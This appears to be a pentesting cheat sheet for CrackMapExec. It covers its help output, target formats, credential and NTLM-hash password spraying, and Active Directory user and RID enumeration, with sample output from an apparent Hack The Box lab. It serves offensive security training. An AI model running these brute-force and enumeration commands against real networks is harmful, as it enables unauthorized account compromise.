Crackmapexec (CME)
CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
Usage
Running cme --help will list general options and protocols that are available (Notice the 'protocols' section below):
#~ crackmapexec --help
usage: cme [-h] [-v] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
[--darrell] [--verbose]
{http,smb,mssql} ...
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks
Forged by @byt3bl33d3r using the powah of dank memes
Version: 4.0.0dev
Codename: 'Sercurty'
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-t THREADS set how many concurrent threads to use (default: 100)
--timeout TIMEOUT max timeout in seconds of each thread (default: None)
--jitter INTERVAL sets a random delay between each connection (default: None)
--darrell give Darrell a hand
--verbose enable verbose output
protocols:
available protocols
{http,smb,mssql}
http own stuff using HTTP(S)
smb own stuff using SMB and/or Active Directory
mssql own stuff using MSSQL and/or Active Directory
Target Formats
Every protocol supports targets by CIDR notation(s), IP address(s), IP range(s), hostname(s), a file containing a list of targets or combination of all of the latter:
crackmapexec <protocol> ms.evilcorp.orgcrackmapexec <protocol> 192.168.1.0 192.168.0.2 crackmapexec <protocol> 192.168.1.0/24crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67crackmapexec <protocol> ~/targets.txtUsing Credentials
Every protocol supports using credentials in one form or another. For details on using credentials with a specific protocol, see the appropriate wiki section. Generally speaking, to use credentials, you can run the following commands:
crackmapexec <protocol> <target(s)> -u username -p passwordℹ️ When using usernames or passwords that contain special symbols, wrap them in single quotes to make your shell interpret them as a string.
Example:
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'Brute force login with wordlists
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwordsℹ️ By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.
Example:
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-successEnumerating with crackmapexec
Here are some common commands to use when enumerating with crackmapexec
Find users
┌──(kali㉿kali)-[~/htb/zephyr/192.168.210.10]
└─$ crackmapexec smb 192.168.210.10 -u users.txt -p passwords.txt
SMB 192.168.210.10 445 ZPH-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:Mail4Painter2022!@# STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:P@ssw0rd STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [-] zsm.local\marcus:!QAZ1qaz STATUS_LOGON_FAILURE
SMB 192.168.210.10 445 ZPH-SVRDC01 [+] zsm.local\marcus:!QAZ2wsxWith credentials we can get all users in the domain:
crackmapexec smb zsm.local -u marcus -p password123 --users
SMB zsm.local 445 ZPH-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB zsm.local 445 ZPH-SVRDC01 [+] zsm.local\jamie:P@ssw0rd
SMB zsm.local 445 ZPH-SVRDC01 [+] Enumerated domain user(s)
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\jamie badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\ca_svc badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\marcus badpwdcount: 6 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\paul.williams badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\daniel.morris badpwdcount: 0 desc:
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB zsm.local 445 ZPH-SVRDC01 zsm.local\Administrator badpwdcount: 3 desc: Built-in account for administering the computer/domainUse --rid-brute to brute all principals in the domain:
crackmapexec smb zsm.local -u <user> -p <password> --rid-brute 10000Last updated